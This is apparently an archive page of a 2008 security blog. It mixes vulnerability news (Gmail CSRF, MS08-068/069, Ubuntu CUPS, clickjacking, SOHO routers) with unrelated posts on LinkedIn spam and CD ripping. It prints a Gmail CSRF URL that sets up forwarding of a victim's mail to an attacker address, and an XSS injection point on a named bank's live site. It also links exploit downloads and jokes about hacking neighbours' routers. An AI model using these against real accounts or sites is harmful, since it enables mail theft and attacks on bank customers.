Gmail Security Flaw PoC-CSRF ?

Geekcondition publish a article Gmail Security Flaw PoC. It's more to CSRF(Cross-site Request Forgery), and manipulating the Gmail live session. This happen when victim visiting malicious website while opening gmail.

Brandon from Geekcondition split out url to variable and look like this.

http://mail.google.com/mail/
?ui=2
&ik=ad7df7dc23 *Unique Account Identifier*
&at=xn3j35svndkg48yp2qgmpt99ivcqdc *Session Authorization Key*
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true

Reference: http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

Recruiter looks for job expertise in LinkedIn without paying for service?

Few of our colleagues that they keep received email invitation to connect to LinkedIn by job recruiter in company email. Some said that it could be company staffs exposed to much their information in social networking application (such as LinkedIn ) or other said staff could sell company email contacts to others for profit purpose.

From I seen, it possible one of the way the recruiter company looking for potential human resources without paying for services. They keep ‘Spamming’ to corporate staff emails and ask to connect to their LinkedIn network group. LinkedIn is one of the best platform to serve or expose your 'Personal Resume' to others party. Below is the screenshot example.

When thinking from security perspective, do you comfortable to expose your information in public? Please think twice before publishing anything about yourself in internet. People can easily look for your information because Google is a good crawler. And LinkedIn is one of crawling favorites list. As I always emphasis, protect yourself securely !

PoC for MS08-069 !

As promised in previous blog i will publishing the PoC related to Microsoft vulnerability MS08-069 at here. The PoC detail can be obtained from http://milw0rm.com/exploits/7196 and description for the MS08-069 can be get from microsoft.

Microsoft Announces Plans for No-Cost Consumer Security Offering-"Morro"

Microsoft giant software company announced to release their security applications to customers with no-cost. The product was expected in the marker by second half 2009. It looks like Microsoft going to enter the security market entirely by introducing their product codename 'Morro'.

Although Microsoft mentioned the product will come with stand-alone application, I still doubt the intention for Microsoft. The 'Morro' product could be one of hard challenges to the available Antivirus products. I foresee that 'Morro' will not much impacts for current security products in Enterprise/Corporate segment within one year due to complexity for the security architecture and designs. It's too costly for Enterprise and Corporate to shift their existing security products to new security products. However, market segment antivirus especially for Home product will be impacted heavily. That is another Microsoft attempt to monopoly the home users aggressively because it's no-charge to consumers.

Hugh... :(
Microsoft -> 'Macrosoft'

ref: http://www.microsoft.com/Presspass/press/2008/nov08/11-18NoCostSecurityPR.mspx

Ubuntu CUPS crash Zero-Day!

GNUCITIZEN founds Ubuntu CUPS crash Zero-Day, they showed PoC on how to remote crash CUPS daemon on localhost:631

The target ubuntu system are:

-Ubuntu 8.04.1 (LTS) Hardy and
-Ubuntu 8.10 (intrepid)

You can read through the detail from gnucitizen and experience the PoC http://snipurl.com/5vp46




Anti-Phishing Game for Fun !

Anti-Phishing Phil introduced online flash game related to Anti-Phishing, you may try to play and learn to differentiate between legitimate website with non-legitimate website. From this game, users were educated to prevent from failing for phishing attacks.

Requirement:
- Any browser that has Flash 8 installed.
- Web browser with Flash 9 in Firefox and IE 7

Play:
http://cups.cs.cmu.edu/antiphishing_phil/new/index.html

MS08-068 PoC exploit tool !

As promised in previous post, MS08-068 PoC exploit tool finally exist in public.

**********************************************************************************

* SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version
* (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
* URL: http://tarasco.org/Web/tools.html

http://milw0rm.com/sploits/2008-smbrelay3.zip

# milw0rm.com [2008-11-14]

Rip entire CD-rom content to iso image

Hi, my friend asking for help on how to copy the entire CD-ROM content as iso image in Ubuntu today. So, I just show him some simple command by using dd . Hence, it will probably help others as well if I share the command in this blog.

$ sudo dd if=/dev/cdrom of=image.iso

How to use the content of image.iso? mounting?

$ mkdir /tmp/mountimage
$ sudo mount -t iso9660 -oloop image.iso /tmp/mountimage

H0w to un-mount the images if not using anymore?
$ sudo umount /tmp/mountimage

New trend security threat ? Clickjacking

Clickjacking ?What's that? It become one of the hot pie issue within IT security field recently, speakers will make it as one of the topic whenever any security conferences held. If you type "Clickjacking" word in google, it will return around ~700K results related to "Clickjacking".



Although this kind of threat already been identified, browsers vendors (IE, FF, Safari, Opera) still not yet have any temporarily solutions for the moments. Similarly to "jacking" techniques are onMOuseUpJacking, FormJacking, SubmitJacking.

When do some research on clickjacking, this technique try to 'foolish' user clicking behavior and it will return profitable for the web-owner by clickon loaded-advertistment. One of the characteristic for 'clickjacking' is try to hide or invisible the button as small as possible. Well, mozopacity javascript or called transparency was used to hide the images, website iframe and etc.

Example:



Some said "NoScript" add-on module can be get in Firefox can prevent from this type of attack, then how about for others browser? According to the pie-chart obtaied from http://en.wikipedia.org/wiki/Usage_share_of_web_browsers; IE browsers still dominating! The risks still out there and wild !

Although we have outstanding tools to prevent this kind of threat, the security responsibility still depend to internet users usage behavior. :(




Definition of Clickjacking can be obtained from http://en.wikipedia.org/wiki/Clickjacking

SOHO routers hacked

While I am searching any documentations, or guide regarding how to 'penetrate' SOHO routers. SourceSec group did researchers on few branded commonly used routers, it sounds great and that the research paper that I am looking for. Hahhaa...my neighborhood 'routers' will get pained for this. :D


SUMMARY

The purpose of this paper is to outline the security measures being taken
by vendors to prevent such attacks in their home routing products, what
those security measures accomplish, and where they fall short. We will use
existing network tools to examine common vulnerabilities in a range of
popular devices and demonstrate weaknesses in the security of those
devices; additionally, we will examine common trends in security measures
that have been duplicated across vendors, and examine how those trends
help and hinder the security of their devices. In particular, we will
examine the following home routers, which are some of the latest offerings
from their respective vendors at the time of this writing:

* Linksys WRT160N
* D-Link DIR-615
* Belkin F5D8233-4v3
* ActionTec MI424-WR


Conclusion:
Router manufacturers are increasing the security of their devices,
however, home router security still has a long road ahead of it. Below is
a table listing each of the devices and their associated, reasonably
exploitable, vulnerabilities mentioned in this paper; these types of
vulnerabilities must be considered by all vendors, and should be
investigated by any consumer before purchasing a router.






Reference:http://www.sourcesec.com/Lab/soho_router_report.pdf

Nov 2008 - Microsoft Tuesday Patches Released

Microsoft officially released two patches for Nov 2008 yesterday. Only 1 critical and 1 important patches were released to fix vulnerability in XML and vulnerability in SMB respectively. These two vulnerability were identified as applicable for remote access code execution.

1. Microsoft Security Bulletin MS08-069 (Critical)
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)

2. Microsoft Security Bulletin MS08-068 (Important)
Vulnerability in SMB Could Allow Remote Code Execution (957097)



Reference:
http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx

What to wait! just go and updates and secure your Mr. Bill's systems :)

As usual, I will going to publish if any PoC for these vulnerability were found.

XSS in Maybank website

Maybank is one of the largest bank in Malaysia, most of malaysian use Maybank for their daily payment transaction and 83.9% of internet users are from Malaysia. To support this, www.maybank2u.com.my deserved 3082 traffic rank in Alexa or you can get the info from
Link: http://www.alexa.com/data/details/traffic_details/maybank2u.com.my

XSS code:
http://www.maybank2u.com.my/thirdparty/thirdpartyreport?url= put script here



Reference: http://security.org.my/index.php?/authors/Mel-Mudin